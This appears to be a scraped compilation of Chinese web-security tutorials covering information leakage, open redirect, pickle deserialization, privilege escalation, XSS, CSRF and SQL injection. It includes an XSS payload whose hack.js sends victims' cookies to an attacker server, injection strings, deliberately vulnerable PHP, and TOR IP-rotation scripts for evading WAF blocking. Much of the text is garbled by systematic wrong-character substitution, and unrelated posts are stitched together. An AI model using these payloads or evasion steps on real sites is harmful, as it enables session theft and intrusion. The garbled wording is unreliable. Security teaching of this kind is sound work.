关于web安全:WEB安全详解信息泄漏漏洞

1.1. 破绽介绍因为网站管理员运维不当,可能会将备份文件、数据库配置文件等敏感文件寄存在WEB目录下公开拜访,攻击者能够轻松地拜访这些敏感文件,从而理解零碎的配置细节、明码信息、数据库凭据等重要数据,扩充的攻击面。 这种透露敏感信息的状况就属于信息透露破绽。 1.2. 破绽发现次要以目录扫描为主,可参考目录扫描,其次以察看或者正则表达式辅助为主。 1.3. 破绽分类1.3.1. 高风险还是具体情况具体分析,如.git源代码透露复原后发现是前端打包代码,可能也没啥用。备份文件透露.git源码透露.svn源码泄露.DS_store透露(遇到比拟多然而简直无危害).hg源码透露(没理论遇到过)CVS源码透露(没理论遇到过)springboot actuator env信息透露报错(调试)页面信息透露(如透露API密钥、数据库明码等)...1.3.2. 低危险安服仔凑数为主Phpinfo()信息透露WEB-INF/web.xml泄露HTTP头信息透露(如服务器版本、技术栈、平安配置等)报错页面信息透露(如透露SQL语句、tomcat版本号等)robots.txt信息透露(透露敏感门路如/admin等,失常的robots.txt如这个是没有危害的!)...具体可在博客中看到,每个内容比拟少,就不独自发了。 1.4. 破绽危害因为信息透露的范畴太过于宽泛,所以危害取决于透露的哪些敏感数据,具体情况具体分析。 如: 透露个人信息: 当个人信息泄露时,攻击者可能获取用户的身份证号码、银行账号、明码等敏感数据,进而进行身份偷盗、歹意购物、虚伪贷款申请等欺诈行为,给用户带来财务损失和信用受损的危险。此外,个人信息的泄露也可能导致用户蒙受电信欺骗,如伪装成非法机构进行钓鱼攻打或社交工程攻打,诱使用户泄露更多敏感信息或转账给攻击者。透露网站备份文件: 当网站的备份文件泄露时,攻击者可能获取到网站的配置文件、敏感数据存储地位和拜访凭证等信息。这意味着攻击者能够取得对网站的齐全或局部控制权,进而进行歹意篡改、删除或增加恶意代码,毁坏网站的失常运行、导致数据失落、影响用户拜访或利用网站进行其余不法行为。此外,泄露的备份文件也可能蕴含用户的个人信息或登录凭证等,减少用户隐衷数据泄露和账号被入侵的危险。1.5. 修复倡议确保敏感文件寄存地位的安全性: 敏感文件应寄存在非Web根目录或受限制的目录中,确保只有受权的用户或零碎能够拜访。管制文件的拜访权限: 通过正确的文件权限设置和访问控制列表(ACL),限度敏感文件的拜访权限,确保只有受权用户能够拜访。定期清理不必要的文件: 删除不再须要的备份文件、临时文件和其余无用文件,以缩小潜在的信息透露危险。定期进行平安审计和破绽扫描: 定期审查网站配置,进行平安审计和破绽扫描,及时发现并修复可能存在的破绽。

May 30, 2023 · 1 min · jiezi

关于web安全:WEB安全任意URL跳转

1.1. 破绽介绍URL跳转破绽(URL Redirection Vulnerability)又叫凋谢重定向破绽(Open Redirect Vulnerability),是一种常见的网络安全破绽,它存在于许多网站和应用程序中。该破绽的根本原因是没有对用户提供的URL进行充沛的验证和过滤,导致攻击者能够通过结构歹意URL,将用户重定向到任意的网站或应用程序中。 1.2. 破绽危害以攻打用户客户端为主,对服务器自身不造成影响。钓鱼攻打: 攻击者能够将用户重定向到伪装成非法网站的钓鱼网站,以获取用户的敏感信息,如用户名、明码、银行账户等。恶意软件流传: 攻击者能够将用户重定向到歹意网站,从而下载和装置恶意软件,对用户设施进行感化。网络针对性攻打: 攻击者能够将用户重定向到特定的歹意网站,利用浏览器或插件破绽来攻打用户的零碎。品牌名誉受损: 歹意重定向可能会导致受攻打网站的品牌名誉受损,用户会失去对该网站的信赖。1.3. 破绽复现1.3.1. 场景搭建将如下代码保留为test.php <?php$url=$_GET['url'];header("Location: $url");?>仍然应用php疾速启动 php -S 0.0.0.0:9999拜访http://internal.gm7.org:9999/test.php即可 1.3.2. 复现过程拜访 http://internal.gm7.org:9999/test.php?url=https://baidu.com,将会跳转到baidu.com 其中baidu.com能够写成任意网站,用户也会依据参数url设置的值跳转到任意网站中。 1.4. 绕过字典下面的复现只是最根底的状况,然而大多数网站都或多或少做过一些加固,这里我间接贴出来我罕用的绕过字典(点击下载),一共637条。 大家在应用的时候,只须要将white.domain替换为指标容许的白名单域名即可。 1.5. 破绽实战某网站存在“浏览原文”性能,如下图 点击后会跳转到对应的网站中,依据教训,可发现goto前面为一串网址的base64编码,因而咱们只须要结构: https://xxx.com/goto/<base64(网址)>就能够跳转到任意网站中,如: https://xxx.com/goto/aHR0cHM6Ly9ibG9nLmdtNy5vcmcv测试后胜利跳转: 1.6. 修复倡议输出验证: 在承受用户输出并用于构建URL跳转性能之前,始终进行输出验证。确保只承受非法的URL,并避免恶意代码的注入。白名单验证: 对于跳转的URL,倡议应用白名单验证,只容许跳转到当时定义的非法域名或URL。平安编码实际: 开发人员应遵循平安编码实际,包含对用户输出进行适当的本义和过滤,以避免歹意URL的结构。正告和提醒: 在重定向之前,向用户显示明确的正告和提示信息,确保用户可能确认将要拜访的指标网站的合法性。

May 24, 2023 · 1 min · jiezi

关于web安全:WEB安全不安全的反序列化

1.1. 什么是序列化和反序列化序列化和反序列化是指用于将对象或数据结构转换为字节流的过程,以便在不同零碎之间进行传输或存储,并在须要时从新结构。 序列化是指将对象或数据结构转换为字节流的过程。在序列化过程中,对象的状态和数据被转换为一系列字节,这些字节能够依照肯定的协定进行传输或存储。序列化通常用于将对象存储到磁盘或通过网络发送到其余零碎。序列化后的字节流能够被保留下来,当前能够通过反序列化操作从新构建对象并复原其状态和数据。 反序列化是指将序列化后的字节流转换回对象或数据结构的过程。在反序列化过程中,字节流被读取并解析,以还原为原始的对象或数据结构。反序列化通常用于从磁盘加载保留的对象或接管通过网络传输的序列化数据。通过反序列化,能够从新构建对象并复原其之前序列化的状态和数据。 序列化和反序列化在许多畛域都有宽泛的利用,例如分布式系统、长久化存储、缓存机制以及跨平台通信。它们容许将简单的对象或数据结构转换为字节流进行传输或存储,从而实现不同零碎之间的数据交换和共享。 1.2. 破绽介绍不平安的反序列化是指在反序列化过程中存在潜在平安危险的状况,如果序列化的内容可控,在传递给利用进行反序列化时,可能会导致执行恶意代码或触发其余不受管制的行为。 以下是一些常见的不平安反序列化的状况: 不受限制的反序列化:如果反序列化操作没有适当的验证和限度,容许任意的序列化数据被反序列化,攻击者能够结构歹意的序列化数据来执行恶意代码。未经过滤的输出:如果反序列化操作承受未经过滤的输出数据,攻击者能够通过结构特定的歹意数据来执行命令或导致不受管制的行为。自定义的反序列化逻辑:如果应用自定义的反序列化逻辑而不是应用平安的序列化库或框架,可能会导致平安问题。自定义逻辑可能不足必要的平安验证和过滤步骤,从而容易受到攻打。歹意的序列化数据:如果攻击者可能在反序列化操作中提供歹意结构的序列化数据,可能会导致命令执行或其余不受管制的行为。1.3. 复现过程网上大多是采纳的php进行复现,一搜一大堆,这里咱们用Python的pickle模块来进行复现。 1.3.1. pickle模块介绍参考 doc,可见是一个序列化模块。 根底应用如下: import pickle# 定义一个对象class Person: def __init__(self, name, age): self.name = name self.age = age# 创立一个 Person 对象person = Person("d4m1ts", 18)# 序列化对象serialized_data = pickle.dumps(person)# 序列化后的二进制数据print(f"序列化后的数据: {serialized_data}", end="\n\n")# 反序列化数据deserialized_person = pickle.loads(serialized_data)# 拜访反序列化后的对象属性print(f"反序列化后的对象所属类: {deserialized_person.__class__}")print(f"name: {deserialized_person.name}") # 输入: d4m1tsprint(f"age: {deserialized_person.age}") # 输入: 18 1.3.2. 魔术办法 __reduce__()在Python中,__reduce__()是一个非凡办法,用于定义对象的序列化行为。当应用pickle模块对对象进行序列化和反序列化时,__reduce__()办法会被调用。 __reduce__()办法应该返回一个元组(),其中蕴含两个或三个元素。元组的第一个元素是用于从新构建对象的函数,第二个元素是传递给构建函数的参数(通常是一个元组),而第三个元素(可选)是用于复原对象状态的可迭代对象。 简略来说,咱们能够通过重写__reduse__()函数,来批改数据反序列化的形式。 批改方才的代码,举例如下: import pickle# 定义一个对象class Person: def __init__(self, name, age): self.name = name self.age = age def __reduce__(self): print("Calling __reduce__()") # return (self.__class__, (self.value,)) return (print, ("reduse poc test",))# 创立一个 Person 对象person = Person("d4m1ts", 18)# 序列化对象serialized_data = pickle.dumps(person)# 序列化后的二进制数据print(f"序列化后的数据: {serialized_data}", end="\n\n")# 反序列化数据deserialized_person = pickle.loads(serialized_data)# 拜访反序列化后的对象属性print(f"反序列化后的对象所属类: {deserialized_person.__class__}")print(f"name: {deserialized_person.name}") # 输入: d4m1tsprint(f"age: {deserialized_person.age}") # 输入: 18可见在反序列化的时候,调用的是咱们重写时用的print办法。 ...

May 23, 2023 · 1 min · jiezi

关于web安全:详解越权漏洞

1.1. 破绽原理越权破绽是指应用程序未对以后用户操作的身份权限进行严格校验,导致用户能够操作超出本人管理权限范畴的性能,从而操作一些非该用户能够操作的行为。简略来说,就是攻击者能够做一些原本不该他们做的事件(增删改查)。 1.2. 破绽分类次要分为 程度越权 和 垂直越权 两大类 1.2.1. 程度越权产生在具备雷同权限级别的用户之间。攻击者通过利用这些破绽,拜访其余用户领有的资源或执行与其权限级别不符的操作。 1.2.2. 垂直越权产生在具备多个权限级别的零碎中。攻击者通过利用这些破绽,从一个低权限级别跳转到一个更高的权限级别。例如,攻击者从普通用户身份胜利跃迁为管理员。 1.3. 破绽举例1.3.1. 程度越权假如一个在线论坛应用程序,每个用户都有一个惟一的用户ID,并且用户能够通过URL拜访他们本人的帖子。应用程序的某个页面的URL构造如下: https://example.com/forum/posts?userId=<用户ID>应用程序应用userId参数来标识要显示的用户的帖子。假如Alice的用户ID为1,Bob的用户ID为2。 Alice能够通过以下URL拜访她本人的帖子: https://example.com/forum/posts?userId=1当初,如果Bob意识到URL参数是可变的,他可能尝试批改URL参数来拜访Alice的帖子。他将尝试将URL参数批改为Alice的用户ID(1): https://example.com/forum/posts?userId=1如果应用程序没有正确施行访问控制机制,没有验证用户的身份和权限,那么Bob将胜利地通过URL参数拜访到Alice的帖子。 1.3.2. 垂直越权假如一个电子商务网站,有两种用户角色:普通用户和管理员。普通用户无限的权限,只能查看和购买商品,而管理员则领有更高的权限,能够增加、编辑和删除商品。 在失常状况下,只有管理员能够拜访和执行与商品治理相干的操作。然而,如果应用程序没有正确施行访问控制和权限验证,那么普通用户可能尝试利用垂直越权破绽晋升为管理员角色,并执行未经受权的操作。 例如,普通用户Alice可能意识到应用程序的URL构造如下: https://example.com/admin/manage-products她可能尝试手动批改URL,将本人的用户角色从普通用户更改为管理员,如下所示: https://example.com/admin/manage-products?role=admin如果应用程序没有进行足够的验证和受权查看,就会谬误地将Alice的角色更改为管理员,从而使她可能拜访和执行与商品治理相干的操作。 1.4. 破绽危害具体以理论越权的性能为主,大多危害如下: 数据泄露:攻击者能够通过越权拜访敏感数据,如个人信息、财务数据或其余敏感业务数据。这可能导致违反隐衷法规、信用卡信息泄露或个人身份盗用等问题。权限晋升:攻击者可能利用越权破绽晋升其权限级别,取得系统管理员或其余高权限用户的特权。这可能导致对整个零碎的齐全管制,并进行更宽泛的歹意流动。1.5. 修复倡议施行严格的访问控制:确保在应用程序的各个层面上施行适当的访问控制机制,包含身份验证、会话治理和受权策略。对用户进行适当的身份验证和受权,仅容许其执行其所需的操作。验证用户输出:应该对所有用户输出进行严格的验证和过滤,以避免攻击者通过结构歹意输出来利用越权破绽。特地是对于波及访问控制的操作,必须认真验证用户申请的合法性。最小权限准则:在调配用户权限时,采纳最小权限准则,即给予用户所需的最低权限级别,以限度潜在的越权行为。用户只应具备实现其工作所需的最小权限。平安审计和监控:建设平安审计和监控机制,对系统中的拜访流动进行监督和记录。这能够帮忙检测和响应越权行为,并提供对事件的审计跟踪。

May 22, 2023 · 1 min · jiezi

关于web安全:通过TOR绕过IP锁定

1.1. 前言平时做我的项目或者挖SRC的过程中,在遇到扫目录或者凑低危用户名枚举等会有大量申请的状况时,总有各种WAF进去拦挡,而且通过各种形式还绕不掉,只能通过换IP的模式来进行绕过。 本文就次要阐明如何通过TOR实现动静IP的形式来绕过IP锁定机制。 1.2. 什么是TORTor(The Onion Router)是一个开源软件我的项目,最后由美国海军钻研实验室(Naval Research Laboratory)开发。它的设计目标是爱护网络通信的隐衷和匿名性。 Tor是一个用于匿名化网络通信的工具和网络协议。它通过在互联网上建设多层加密和隧道路由来暗藏用户的实在身份和地位信息。Tor通过将用户的通信流量通过多个两头节点(也称为中继)进行随机路由,使得追踪用户的起源和目的地变得艰难。 只管Tor提供了肯定水平的隐衷和匿名性,但它并不齐全免疫于攻打和平安威逼。 Tor网络可能受到流量剖析、进口节点的歹意行为以及入口和中继节点的攻打影响。此外,Tor的性能也可能受到限制,导致较慢的网络连接速度。为了应答这些问题,Tor我的项目一直进行改良和更新,以进步安全性和性能。将来的倒退方向可能包含更弱小的加密算法、更好的防御机制和更高效的路由抉择算法。同时,用户教育和意识的进步也是重要的,以正确应用Tor并了解其局限性和潜在的威逼。总结起来,Tor是一个用于匿名化网络通信的工具和协定,它通过多层加密和隧道路由暗藏用户的实在身份和地位信息。尽管Tor提供了肯定水平的隐衷和爱护,但它并非相对平安,可能存在攻打和性能方面的局限性。Tor我的项目在不断改进和倒退,以提供更弱小的隐衷爱护解决方案。 1.3. 环境需要国外 Ununtu 20.04.5 LTS1.4. 过程记录1.4.1. 根底应用装置配置TOR sudo apt install tor编辑配置文件/etc/tor/torrc,删掉SocksPort端口前的正文,同时减少一行 SocksPolicy accept * 测试成果 curl -x socks5://127.0.0.1:9050 ifconfig.io 1.4.2. 降级应用到当初tor能失常走代理用了,然而有个新的问题,就是它的IP在一段时间内固定的,而咱们绕过就须要打一枪换个中央,也就是须要继续切换新的IP。 办法一:通过批改配置在配置文件/etc/tor/torrc中加上最初两行 MaxCircuitDirtiness 1NewCircuitPeriod 1解释如下: MaxCircuitDirtiness:该配置项规定了Tor电路的最长可应用工夫,以秒为单位。当一个电路的应用工夫达到这个设定值后,Tor会敞开该电路并创立一个新的电路。NewCircuitPeriod:该配置项规定了Tor被动创立新电路的工夫距离,以秒为单位。当设定的工夫距离过来后,Tor会敞开以后的电路并建设一个新的电路。但通过测试,大概为每10秒会切换1次IP,并不会1秒切换1次。 while true; do curl -x socks5://127.0.0.1:9050 ifconfig.io sleep 10done演示后果如下: 办法二:通过软重启执行如下命令,该命令用于向运行在零碎上的 Tor 过程发送 SIGHUP 信号,以触发 Tor 过程从新加载配置文件(软重启) killall -HUP tor因而咱们如果想要每秒切换IP,能够写一个简略的bash如下 while true; do killall -HUP tor sleep 1done而后再写一个bash每秒查一次以后IP while true; do curl -x socks5://127.0.0.1:9050 ifconfig.io sleep 1done胜利每秒切换1个IP ...

May 12, 2023 · 1 min · jiezi

关于web安全:某课网Web-安全实战宝典无mi

download:某课网Web 平安实战宝典无mi常见网络安全破绽及测试方法介绍背景介绍Web利用个别指通过HTTP/HTTPS协定提供服务的B/S架构。随着互联网的倒退,Web利用曾经融入到咱们日常生活的方方面面。在目前的web利用中,大部分都不是动态的Web浏览,而是波及到服务器的动静解决。如果开发者的安全意识不强,就会导致Web利用的平安问题层出不穷。 一般来说,Web利用攻打是指攻击者通过浏览器或其余攻打工具,在URL或其余输出区域(如表单等)向Web服务器发送非凡申请。),从而发现Web利用中的破绽,进而操作控制网站,达到入侵者的目标。 常见的安全漏洞一.SQL注入SQL注入是影响宽泛的最常见的破绽。攻击者通过在Web表单中插入SQL命令或输出域名或页面申请的查问字符串,最终坑骗服务器执行歹意的SQL命令,从而入侵数据库执行任何不请自来的查问。 SQL注入可能造成的危害有:网页和数据被篡改,外围数据被窃取,数据库所在的服务器被攻打,成为傀儡主机。 比方有些网站不应用预编译sql,用户在界面上输出的一些字段就增加到sql中。这些字段很可能蕴含一些歹意的sql命令。例如password = "1 "或" 1 " = " 1 ";即便不晓得明码,也能够失常登录。测试方法: 在要查问的页面上,输出正确的查问条件、1=1等简略的sql语句,查看响应后果。如果与输出正确的查问条件返回的后果统一,阐明应用程序没有对用户输出进行过滤,能够初步判断这里存在SQL注入破绽。 二、XSS跨站脚本攻打 SS(跨站脚本),与SQL注入相似,XSS通过网页插入歹意脚本,应用的次要技术是前端HTML和JavaScript脚本。在用户浏览网页时,实现管制用户浏览器行为的攻击方式。 一个胜利的XSS能够获取用户的cookie,利用cookie窃取用户经营网站的权限;还能够获取用户的联系人列表,利用攻击者的身份向特定目标群体发送大量垃圾邮件等等。 XSS可分为三种类型:存储型(长久XSS)、反射型(非长久XSS)和DOM型。 测试方法: 在数据输出界面,输出:alert(/123/)。如果保留胜利后弹出对话框,阐明这里存在XSS破绽。 或者将url申请中的参数更改为alert(/123/)。如果页面上弹出一个对话框,这里就存在一个XSS破绽。 第三,CSRF跨站伪造申请攻打CSRF(跨站申请伪造),利用登录用户身份,以用户名义发送歹意申请,实现非法操作。 例如,如果用户浏览并信赖存在CSRF破绽的网站A,浏览器会生成相应的cookie,用户无需退出该网站即可拜访危险网站B。 危险网站B要求拜访网站A并提出申请。浏览器用用户的cookie信息拜访了网站A。因为网站A不晓得是用户的申请还是危险网站B的申请,所以会解决危险网站B的申请,从而实现模仿用户操作的目标。这是CSRF防御的基本思路。 测试方法: 当两个页面被同一个浏览器关上时,一个页面的权限过期后,另一个页面是否能操作胜利,如果还能操作胜利,就存在危险。2.应用该工具发送申请,而不在http申请头中增加referer字段,并查看返回音讯的响应。应该从新定位到谬误界面或者登录界面。 四。文件上传破绽文件上传攻打是指攻击者将可执行文件上传到服务器并执行。 这种攻打是最间接无效的。上传的文件能够是病毒、木马、歹意脚本、webshell等。 HELL是asp、php、jsp、cgi等网页模式的命令执行环境,也能够说是网页的一个后门。受影响的零碎阻止或插入webshell后,攻击者能够很容易地通过webshell进入零碎,从而管制网站服务器。 测试方法: 严格查看上传文件的类型和大小,禁止上传带有恶意代码的文件。 查看相干目录的执行权限。您能够通过浏览器拜访Web服务器上的所有目录,并查看是否返回目录构造。如果显示目录构造,可能存在平安问题。 动词 (verb的缩写)URL跳转破绽URL跳转破绽,即未经验证的重定向破绽,是指Web程序间接跳转到参数中的URL,或者在页面中引入任意开发者的URL,将程序引向不平安的第三方区域,从而导致平安问题。 测试方法: 1.应用包抓取工具抓取申请。 2.抓取302的网址,批改指标地址,看能不能跳转。 Ps:然而当初很多跳转都是referer查看,导致攻击者无奈跳转。 摘要以上是一些常见的Web安全漏洞和测试方法。随着人们对网络安全的日益器重,Web平安测试在测试过程中的重要性日益凸显。尽管也有AppScan等破绽扫描工具,然而测试人员须要理解一些常见的安全漏洞。

September 16, 2022 · 1 min · jiezi

关于web安全:某课Web-安全实战宝典无密分享

download:某课-Web 平安实战宝典无密分享定义播送随着一系列新的互联网产品的诞生,如Web2.0、社交网络、微博等。基于Web环境的互联网利用越来越宽泛。在企业信息化的过程中,各种利用都是建设在Web平台上的。Web服务的疾速倒退也引起了黑客的强烈关注,随之而来的是Web平安威逼的凸显。黑客通过利用网站操作系统的破绽和web服务程序的SQL注入破绽取得Web服务器的控制权。鉴于此,他们篡改网页内容,窃取重要的外部数据,更重大的是,他们在网页中植入恶意代码,使网站访问者深受其害。这也使得越来越多的用户开始关注应用层的安全性,对Web利用安全性的关注也逐步升温。以后局势编辑和播送 许多业务依赖于互联网,如网上银行、网上购物、网上游戏等。很多歹意攻击者出于不良目标对Web服务器进行攻打,千方百计通过各种伎俩获取别人的个人账户信息,以谋取利益。正因为如此,网络商务平台是最容易受到攻打的。同时,对Web服务器的攻打能够说是形形色色,多种多样,常见的攻打有挂马、SQL注入、缓冲区溢出、嗅探、IIS等。一方面,TCP/IP的设计没有思考平安问题,使得网络上传输的数据没有任何平安爱护。攻击者能够利用系统漏洞造成零碎过程缓冲区溢出。攻击者可能取得或降级他们在易受攻击零碎上的用户权限,以运行任意程序,甚至装置和运行恶意代码来窃取秘密数据。而利用级软件在开发过程中没有过多思考平安问题,使得程序自身存在很多破绽,比方缓冲区溢出、SQL注入等风行的利用级攻打,都是因为软件开发过程中疏忽了平安思考而导致的。 另一方面,用户对一些隐秘的货色有着强烈的好奇心。一些利用木马或病毒程序进行攻打的攻击者,往往利用了用户的这种好奇心,将木马或病毒程序捆绑成一些富丽的图片、音视频、免费软件等文件,而后将这些文件搁置在一些网站中,再诱惑用户点击或下载。或者通过邮件附件和QQ、MSN等即时聊天软件将这些绑定木马或病毒的文件发送给用户,利用用户的好奇心诱惑其关上或运行这些文件。 攻打类别编辑和播送1.SQL注入:即通过在Web表单中插入SQL命令来提交或输出域名或页面申请的查问字符串,能够坑骗服务器执行歹意的SQL命令。例如,以前很多影视网站泄露VIP会员明码大多是通过web表单提交查问字符,这类表单特地容易受到SQL注入攻打。 2.跨站脚本攻打(又称XSS):指利用网站破绽歹意窃取用户信息。当用户浏览网站,应用即时通讯软件,甚至浏览电子邮件时,他们通常会点击链接。通过在链接中插入恶意代码,攻击者能够窃取用户信息。 3.网页挂马:将一个木马程序上传到一个网站,而后应用木马生成器创立一个网页木马,再增加代码使木马在关上的网页中运行。 防火墙的编辑播送Web利用平安实质上来源于软件品质。然而,与传统软件相比,Web利用有其独特性。Web应用程序对于一个组织来说往往是惟一的,已知的通用破绽签名对于其破绽是有效的。须要频繁的变更来满足业务指标,这使得很难维持有序的开发周期;须要充分考虑客户端和服务器端简单的交互场景,往往很多开发人员对业务流程不是很理解;人们通常认为Web开发很简略,没有教训的开发者也能做。Web利用平安,现实状况下应该遵循软件开发生命周期中的平安编码准则,在每个阶段采取相应的安全措施。但大多数网站的理论状况是:大量晚期开发的web利用,因为历史起因,都存在不同水平的平安问题。对于这些曾经上线和正在生产的Web利用,因为其定制化的特点,没有通用的补丁可用,整改代码因老本高而变得难以实现或须要较长的整改周期。 在这种状况下,业余的网络安全防护工具是一个正当的抉择。利用防火墙(WAF)正是这样一款业余工具,它提供了一种平安运维管制办法:基于HTTP/HTTPS流量的双向剖析,为WEB利用提供实时爱护。常见的WEB平安产品有barracuda WEB利用防火墙等。 技术概述编辑和播送随着黑客的专业化水平越来越高,针对Web利用的攻打伎俩和技术也越来越精良和荫蔽,这导致大多数Web利用都是在高危环境下开发的。对网站的攻打会间接冲破企业应用的平安底线,侵害企业的社会形象,导致客户的散失。梭子鱼Web利用防火墙能够为企业提供弱小的应用层平安防护,同时通过梭子鱼直观、实时的治理界面对WEB利用进行对立治理。 全面的网站爱护绝对于IPS对HTTP、HTTPS、FTP流量的简略操作,Web利用防火墙作为HTTP流量的代理,全面扫描7层数据,确保攻打在达到WEB服务器之前就能被阻断。因为很多Web利用的间歇性代码加固和平安保护,这些Web利用通常存在重大的安全漏洞和隐患。防火墙能够阻止所有常见的网络攻击。作为反向代理,能够在阻断攻打的同时,全面监控外发HTTP响应,确保信用卡号、社保卡号等敏感信息的泄露。联合动静学习性能,利用防火墙能够学习Web服务器的内部结构并生成策略,保障网站的高安全性。

September 16, 2022 · 1 min · jiezi

关于web安全:Web安全业务安全

Web平安名词定义 窃听者:在网络中通过抓包、劫持等形式可能获取用户申请数据的Hacker 窃密者:通过非正常伎俩可获取到用户数据的Hacker 攻击者:具备肯定计算机网络根底可能通过工具或者自主开发工具实现非凡目标的Hacker 摘要算法:音讯摘要算法是密码学算法中十分重要的一个分支,它通过对所有数据提取指纹信息以实现数据签名、数据完整性校验等性能。因为其不可逆性,有时候会被用做敏感信息的加密。 加密算法:加密(英语:Encryption)是将明文信息扭转为难以读取的密文内容,使之不可读的过程。只有领有解密办法的对象,经由解密过程,能力将密文还原为失常可读的内容。加密算法即加密的办法。 TOP 1 拜访越权未进行最小权限校验通常因为未对用户集体/设施等隐衷数据的拜访、批改进行应该权限查看而呈现的越权拜访;普通用户通过伪造申请拜访管理员能力拜访的数据等 ⚔️原申请:curl 'http://example.com/getUserInfo' -H 'accessToken:abc' -d '{"uid":123}' 返回123用户的信息 批改后的申请:curl 'http://example.com/getUserInfo' -H 'accessToken:abc' -d '{"uid":321}' 返回321用户的信息 普通用户伪造申请:curl 'http://example.com/getAdminUserList' ️ 针对有用户属性资源(如用户信息、用户上传的非公开图片、用户集体资产等)的申请需校验以后申请用户的权限针对有设施属性资源(如打印申请、打印历史记录等)的申请需校验以后申请用户是否有该设施权限对于后盾类资源申请需校验用户管理员权限重放攻打网络中存在窃听者将获取到的用户申请数据用于反复申请获取敏感信息 ⚔️ 原申请:curl 'http://example.com/resetPassword' -H 'accessToken:abc' -d '{"smsCode":1234}' 申请后用户可进入用户明码重置流程 反复申请:curl 'http://example.com/resetPassword' -H 'accessToken:abc' -d '{"smsCode":1234}' 申请后窃听者可进入用户明码重置流程 ️ 每个申请增加申请工夫,对于过期的申请间接拦挡可在分发给用户的token中关联用户IP、设施等信息,对于IP、设施更换的申请间接拦挡(在挪动网络中用户的IP可能随时变动会导致影响普通用户应用,须要留神业务是否须要如此高的危险等级)篡改申请因为未对残缺的申请参数进行签名,导致窃听者获取到用户申请后能够通过批改申请参数实现不同的目标 ⚔️ 原申请:curl 'http://example.com/transferMoney' -H 'accessToken:abc' -H 'sign:abcd' -H 'requestTime:1024' -d '{"toAccount":123,"money":100}' (其中sign仅对requestTime、accessToken做签名) 批改后的申请:curl 'http://example.com/transferMoney' -H 'accessToken:abc' -H 'sign:abcd' -H 'requestTime:1024' -d '{"toAccount":321,"money":100000}' ️ 对所有的申请参数进行签名而不是局部参数(如sign(requestParam,body))对于有须要参加签名的参数应用body而不是header传输(header蕴含其余非业务参数无奈做对立签名)敏感数据透露通常呈现在用户的明码、人脸信息、签名信息等敏感信息在网络传输过程中或存储过程中未进行妥善的脱敏解决;加密算法未增加适合的随机因子导致密钥可被计算 ⚔️ ...

June 10, 2022 · 1 min · jiezi

关于web安全:使用云效Codeup10分钟紧急修复Apache-Log4j2漏洞

简介:2021年12月10日,国家信息安全破绽共享平台(CNVD)收录了Apache Log4j2近程代码执行破绽(CNVD-2021-95914),此破绽是一个基于Java的日志记录工具,为Log4j的降级。作为目前最优良的Java日志框架之一,被大量用于业务零碎开发。 破绽信息 早在2021年11月24日阿里巴巴云平安团队就报告了该破绽,为了帮忙大家更快的辨认破绽,防止受到潜在的攻打,云效技术团队提供了针对该破绽的解决计划。 源码级扫描,将危险及时扼杀阿里云云效代码治理平台 Codeup 的「依赖包破绽检测」反对在源码层面实时扫描依赖包危险,并提供破绽修复计划,可针对企业代码库主动扫描破绽并疾速报出,防止人工肉眼排查可能造成的危险脱漏。 本次 Log4j 已被定义为 Blocker 级别高危破绽,强烈建议尽快降级修复: 如何应用检测代码库管理员进入仓库设置-集成与服务中开启「依赖包破绽检测」,请留神 Java 代码须要勾选「设置 Java 检测参数」: 开启后默认分支将主动开始执行检测,期待检测实现,可查看分支代码检测详情,在检测报告中提供了破绽阐明与修复计划倡议: 因为破绽库实时更新,历史已开启扫描的代码库须要被动开关或提交代码以触发执行一次最新扫描。 如何修复破绽根据检测倡议,批改 Apache Log4j 相干依赖版本至最新的 Log4j-2.15.0 。 主动修复破绽手动顺次更新依赖文件十分繁琐,云效代码治理平台 Codeup 还提供了智能化的破绽主动修复能力,当检测出存在该安全漏洞时,在「平安」问题列表页面将提供黄色标识,反对一键主动修复破绽: 开展问题详情,点击「创立合并申请主动修复」按钮将主动生成一个合并申请,人工审核确认后可一键合并,主动修复破绽: 查看文件差别能够看到该合并申请已主动将代码 pom.xml 中的 Log4j 依赖版本升级到倡议的平安版本: 人工确认后点击合并,代码合并变更将主动从新触发代码检测服务,查看检测后果可确认破绽已修复解决: 极致的云端代码托管爱护本次 Apache Log4j2 开源依赖包破绽为所有人敲响警钟,企业的代码作为最重要的数字资产之一,很可能正面临着各种平安危险。企业和开发者在解决这个单点问题的同时,还须要思考如何更全面的保障本人的代码数据安全。 阿里云云效代码治理平台 Codeup 提供了丰盛的平安服务,在拜访平安、数据可信、审计风控、存储平安等角度全方位保障企业代码资产平安,如果你开始器重平安这件事,无妨立刻返回云效 Codeup 开始摸索。 原文链接本文为阿里云原创内容,未经容许不得转载。

December 14, 2021 · 1 min · jiezi

关于web安全:腾讯安全发布新一代Web应用防火墙

October 22, 2021 · 0 min · jiezi

关于web安全:常见web攻击

常见web攻打随着互联网的发达,各种WEB利用也变得越来越简单,满足了用户的各种需要,然而随之而来的就是各种网络安全的问题。作为前端开发行业的咱们也逃不开这个问题。所以明天我就简略聊一聊WEB前端平安以及如何防备。 1、XSS  Cross Site Scripting    跨站脚本攻打XSS (Cross-Site Scripting),跨站脚本攻打,因为缩写和 CSS重叠,所以只能叫 XSS。跨站脚本攻打是指通过在存在安全漏洞的Web网站注册用户的浏览器内运行非法的非本站点HTML标签或JavaScript进行的一种攻打。歹意攻击者往Web页面里插入歹意Script代码,当用户浏览该页之时,嵌入其中Web外面的Script代码会被执行,从而达到歹意攻打用户的目标。    XSS攻打分类  反射型 - url参数间接注入// 一般 http://localhost:3000/?from=china // alert尝试 http://localhost:3000/?from=<script>alert(3)</script></script>) // 获取Cookie [http://localhost:3000/?from=<script src="http://localhost:4000/hack.js"></script>]()引入了攻击者服务器中的一个js文件 hack.js var img = new Image()      img.src='http://localhost:4000/img?c='+document.cookie hack.js中申请了攻击者服务器并带上了被攻击者的cookie。而后攻击者服务器只须要: app.use(async (_ctx_, _next_) => { log('attack...:' + _ctx_.url)await _next_()}) 就能够获取到被攻击者的cookie // 短域名伪造 https://dwz.cn/ // 伪造cookie入侵 chrome     document.cookie= xxx  存储型 - 存储到DB后读取时注入存储型xss个别呈现在评论中,如果评论提交的内容被间接塞入数据库例如:{// 评论     <script>alert(1)</script>     _// 跨站脚本注入 _    我来了<script src="http://localhost:4000/hack.js"></script>} 提交: router.post('/updateText', async (_ctx_) => { text = _ctx_.request.body.textres = await query(`REPLACE INTO test.text (id,text) VALUES(1,'${text}');`)_ctx_.redirect('/')}); 没有解决间接塞到数据库,那么当数据被返回前端页面时如果也没做解决,那么被注入的js代码就会被执行。拜访到以后页面的用户尽管什么都没做,然而也会被攻击者获取到cookies。 